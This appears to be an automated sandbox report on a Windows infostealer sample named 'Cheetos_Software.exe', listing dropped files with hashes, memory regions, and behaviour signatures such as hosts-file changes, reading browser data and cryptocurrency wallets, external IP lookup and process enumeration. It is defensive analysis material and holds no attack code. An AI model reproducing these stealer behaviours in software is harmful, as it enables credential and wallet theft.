C:\Users\Admin\AppData\Local\Temp\_MEI34842\_bz2.pyd

MD5 341a6188f375c6702de4f9d0e1de8c08
SHA1 204a508ca6a13eb030ed7953595e9b79b9b9ba3b
SHA256 7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e
SHA512 5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

C:\Users\Admin\AppData\Local\Temp\_MEI34842\unicodedata.pyd

MD5 6279c26d085d1b2efd53e9c3e74d0285
SHA1 bd0d274fb9502406b6b9a5756760b78919fa2518
SHA256 411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6
SHA512 30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

C:\Users\Admin\AppData\Local\Temp\_MEI34842\sqlite3.dll

MD5 cc9d1869f9305b5a695fc5e76bd57b72
SHA1 c6a28791035e7e10cfae0ab51e9a5a8328ea55c1
SHA256 31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee
SHA512 e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

C:\Users\Admin\AppData\Local\Temp\_MEI34842\select.pyd

MD5 2398a631bae547d1d33e91335e6d210b
SHA1 f1f10f901da76323d68a4c9b57f5edfd3baf30f5
SHA256 487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435
SHA512 6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI34842\blank.aes

MD5 aa8030686d448b5a88f72b770c0f8c3a
SHA1 498f03e1dd788ff33cdd570eb00a85ee0e035bcd
SHA256 6a7c9ca577a6df02833911bea20dcec90e40f3dafaab330eff316cbfb4e24e8b
SHA512 f8eaf48d3919e85fd1eda64dc453c1fb1ea719a68e6b128ba19fe6ad74f123c7de8379a39d31cf67e25a45023716cd7e171933e0be1cd2a3a8d60f496f3e77af

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/2000-54-0x00007FFD401B0000-0x00007FFD401DD000-memory.dmp

memory/2000-56-0x00007FFD40190000-0x00007FFD401A9000-memory.dmp

memory/2000-58-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/2000-60-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

memory/2000-65-0x00007FFD404E0000-0x00007FFD404ED000-memory.dmp

memory/2000-67-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

memory/2000-70-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-74-0x0000018F35820000-0x0000018F35D42000-memory.dmp

memory/2000-78-0x00007FFD40180000-0x00007FFD4018D000-memory.dmp

memory/2000-79-0x00007FFD2FD00000-0x00007FFD2FE1C000-memory.dmp

memory/2000-81-0x00007FFD3CD20000-0x00007FFD3CD34000-memory.dmp

memory/2000-80-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

memory/2000-71-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

memory/2000-62-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-82-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

memory/4856-83-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4856-84-0x000001B371A80000-0x000001B371A90000-memory.dmp

memory/4856-85-0x000001B371A80000-0x000001B371A90000-memory.dmp

memory/4856-92-0x000001B371A50000-0x000001B371A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_waaktbr0.nq3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/956-97-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/956-99-0x000001B49DB90000-0x000001B49DBA0000-memory.dmp

memory/956-98-0x000001B49DB90000-0x000001B49DBA0000-memory.dmp

memory/3748-109-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/3748-110-0x000001DC27BD0000-0x000001DC27BE0000-memory.dmp

memory/4260-132-0x00000139F37C0000-0x00000139F37D0000-memory.dmp

memory/2000-134-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/3404-133-0x00000251A06E0000-0x00000251A06F0000-memory.dmp

memory/4260-128-0x00000139F37C0000-0x00000139F37D0000-memory.dmp

memory/3404-126-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4260-120-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4856-147-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.cmdline

MD5 08bf01b01ac8a68d7fc98a1f7ae670b0
SHA1 7c0e975cc5e68e7e77a9219db87ee787e638815d
SHA256 01dc517fd7c36caad4300f91c50b93786fcd51cb365126bfbd522d8d19c0eaa5
SHA512 2a2cd20e3530eab0c9988e04fac628320ba996d8ee36c5596617d811b6c17dd96e647ac3b8a5dbebc56d7c5fe33916e4c50408514fd312cb241aaf16bf63e96a

memory/3404-157-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/956-177-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/3748-181-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4260-182-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bf7b73e38e4a79c2a863a0c331e2000e
SHA1 8086254ce77c67e94b9c1380e3f502523399ab9e
SHA256 669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0
SHA512 a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

memory/4260-165-0x00000139DB550000-0x00000139DB558000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.dll

MD5 d92d7eba72a80135b702e2af00231690
SHA1 b483458dd24cf814f5103b3810d7237fd2896481
SHA256 312ef5537dc7b22533fcf12b17eabdc1dcaa021d5e009b770acc57460c3a6997
SHA512 0c45a5e04774eb28ff60f3e86fee479a4b5d8c4078123f4ea06c0bbe171c772abe0359b5e036320c36946cdf587d54bf8206c0529478db69cb6687356927aed4

C:\Users\Admin\AppData\Local\Temp\RES43A0.tmp

MD5 45be72ba7b58b9dbb44697564aff5746
SHA1 ad0f3808d4fc8013a230760508a17dbd046c246c
SHA256 821e38d5b46642c2d003d06d3f7c0c882a9f24b57474c301c7854a29615f78a7
SHA512 c1ad94d224ecb7302746c0b84d0b7a8e807196b9bee26e772dcb061184562267a8e3b463c18302ac8cb30b50565354dd65210f6acb901015c4012aa1af458576

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\CSCEE286FF59FEA47D09589A43890A1D67D.TMP

MD5 621a219ba256c8f4b872713e1863c444
SHA1 f26f9e1947868d25054d54b5c513ecfee19242c3
SHA256 a3d61d9a2a39e6b1c94cd8c9c860b4bbadba0e670a98cd7992b52f690daa40ab
SHA512 71e404c079c1901227533cec05c5f13e5c53495c60425717a3f805d9dc7d3a31e987fc550c9a21eabf3937597a07d411a9bcb1cde6a1cecd5e3c62678194e6bf

memory/2000-217-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-216-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3096-228-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/3096-229-0x000002034D440000-0x000002034D450000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

memory/3096-230-0x000002034D440000-0x000002034D450000-memory.dmp

memory/2000-234-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-244-0x0000018F35820000-0x0000018F35D42000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/4352-248-0x0000026A32D70000-0x0000026A32D80000-memory.dmp

memory/4352-246-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/4352-247-0x0000026A32D70000-0x0000026A32D80000-memory.dmp

memory/2000-249-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ​     \Display (1).png

MD5 3d5aec3a24d34de388b4a420abbfa874
SHA1 5bd8e9d330f0d13eb9fbf39eaa235c9700865540
SHA256 01b3994ce2935e10f184b251da58315281b5c7b847bfd322486d51b2446b7735
SHA512 34f0de2186dbebfd08b9b8c3d069020b8782b82e398ab1b5662640df1e74ee9278d0d055e24a2d56d7672f091255f16113061af8f0a41e171ab9c81f39b9cd67

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Pictures.txt

MD5 823f010349af77dfbf69b1a3dd6193cb
SHA1 cf14f537ad8c0926f0fcd67ef246ac8bf7d4134e
SHA256 73832e83177f8b9a30d8c2e11ddfc4869e2c9e5ca64eb1a7895e587a2ef2fa2c
SHA512 b82dd6d69490634a59f1dde25ced107fa5abda784af097caa7fa7b9949347406e8b64144cc8639228bdaf1f44ecde29e7724f8e71768d0a77c1eea298631c63b

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Music.txt

MD5 d3ab47558ad0b3d1e5fd48ed4d6748a9
SHA1 0a3f23e77552b8285a15af3bfa3cc5b158ce53be
SHA256 21f17383f2c839afbb0ff0411e36103255fc549544717901acf5ef6a72c95656
SHA512 e2ae29c0a80dd4e84f76c0e21fac6e0fe85b258bee5c63c33499c0d3ffc95917086ef253dc0045febe02e28329078f43730b33e74093862831e897aaae2b33a4

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Downloads.txt

MD5 62260e5e102350fca99a70e3ef75eab7
SHA1 bf07469ed9b0cb1b6724cba25db434f93dcb2ec3
SHA256 3f76d6d81003e8fcc9c85daeb92891adfd0a0a27894dd886644ad3ebe4c8e13c
SHA512 b6c114eda1f59f20c329b1024bcc7876897e58c06dca6fd362795a127965ae0a6a1042b023a28bf4e02265069edee0c47c7eac6f3b260a460319ed99c52308f5

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Documents.txt

MD5 e3675b6cb2259055777d40722b97a06d
SHA1 98090eef0a4a205054827abf747295810618b5e1
SHA256 60c612f3328aedd86d6f2355441a1cf63398c84b8a396d4d80aad7e10feaa0ca
SHA512 7e926089101b7f2812a25bc245f037ffcf3f500e70beea0708c5ec0621a323ab2e35eccd4971e0a133602a61b65a582d9b6b4b99a423d8ea4d168ea60d6ab32b

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Desktop.txt

MD5 18dca103cb9f9052e49d1e07e919afe7
SHA1 09a88db39b62f83016b3b249fa2d4fdfcf87ea77
SHA256 776583ed9b7c22a0ac7c83cd870d24cbcfdeb667d8016e240b7e987282e7a3a8
SHA512 ad9b3b941642c8dabf8b778239bb772f6785b02128627abc35cfe6067a4d4d69f6d4f9b226b2715a4ad2e717924029192fc60a36b8cffd9df68c3b7b09828cf4

memory/4352-252-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TpyFv.zip

MD5 c127887c4bd5e93634d7cd0ab785ee7f
SHA1 bd264d1d63152a551ee53c590f3261710f36be43
SHA256 e694c71c8b76b58589286f85a300a86a973a281edd5bb7ff97faa37895a89167
SHA512 2bdf9933759dc5918b5516626b082f44151ec3061651bf83c6c4515eeb0321a8f2316f19848129b4e25993223b7e0399480166996bef71172398afaca88d0cec

memory/2000-266-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ea31fd5a6a33c82308bc60de219af3f4
SHA1 3fbdc4e89a9f029948cf76e217ff7814056aeeee
SHA256 408fb4485a08482f83a56641482ab6640ace017d9767f445231f4ac6e31b8ba1
SHA512 91587bd790e1ed7d64dff5ed45f3e45b657008bf1e9e4a6fb28d1c36dfc7cd6708cc2e0695a8350b343dd0a279dc34829da9b057c3c839b7326b4dc8f9bb74db

memory/436-277-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/436-279-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ​     \System\Task List.txt

MD5 d8fe2e098649e7aa50647d6c2a45cf03
SHA1 2c31c72fac3384278e52ebbdbcc8363325312c5c
SHA256 29e14401f31b9823bb988f42cbb372a0d9d3f88eca8c12c7a60f051a82ece835
SHA512 1f5f81b8faf2bca37b1d038168aa58c75de04370156a22c3a809179e84cc5746919b0e4d970eb414d57102e32a5d510b69a9213a580fcdc395f80dba65e681b0

C:\Users\Admin\AppData\Local\Temp\    ​     \System\System Info.txt

MD5 16244c3920347ba5f41281a36c6f9749
SHA1 e1d11f16c400683292e34e6a480a0a33f322ba1a
SHA256 e2cadcf9b2e5a35d719796a2763a459e21f366f6fac341688f8497a05f2d1f5f
SHA512 1a92b02bb6dd918dc580ac368385bdd27a7be7c3b982843c02faf6f59d900c122549ac27a1762b0622101b091684db872006998e732eb27c97b48f83b51ec55b

C:\Users\Admin\AppData\Local\Temp\    ​     \System\MAC Addresses.txt

MD5 6dad4876cc765c72b511349b4e25aaa3
SHA1 e4b9cf54ff3424526b4dd12b4b5019c12f2a9cf7
SHA256 7f88dfee0d4f9abbc1509f1648cad4ce95b3301aff91b1c13fa523acf2e8d7f2
SHA512 c171a678168dbebcae9a2eefe689e6353f81bf266476bae24322af2772c6ba732b833842c896abaf6e097df9643228147c9998c98693e05ba9331fdf7c0c226c

memory/5100-289-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/5100-291-0x000002341F0A0000-0x000002341F0B0000-memory.dmp

memory/5100-290-0x000002341F0A0000-0x000002341F0B0000-memory.dmp

memory/5100-293-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/3096-232-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/2000-294-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

memory/2000-295-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

memory/2000-305-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

memory/2000-308-0x00007FFD2FD00000-0x00007FFD2FE1C000-memory.dmp

memory/2000-307-0x00007FFD40180000-0x00007FFD4018D000-memory.dmp

memory/2000-306-0x00007FFD3CD20000-0x00007FFD3CD34000-memory.dmp

memory/2000-304-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-303-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

memory/2000-302-0x00007FFD404E0000-0x00007FFD404ED000-memory.dmp

memory/2000-301-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-300-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

memory/2000-299-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/2000-298-0x00007FFD40190000-0x00007FFD401A9000-memory.dmp

memory/2000-297-0x00007FFD401B0000-0x00007FFD401DD000-memory.dmp

memory/2000-296-0x00007FFD49860000-0x00007FFD4986F000-memory.dmp

memory/3916-311-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-321-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-320-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-319-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-318-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-317-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-316-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-315-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-310-0x00000270E5830000-0x00000270E5831000-memory.dmp

memory/3916-309-0x00000270E5830000-0x00000270E5831000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 20:08

Reported

2024-04-07 20:11

Platform

win11-20240221-en

Max time kernel

94s

Max time network

98s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
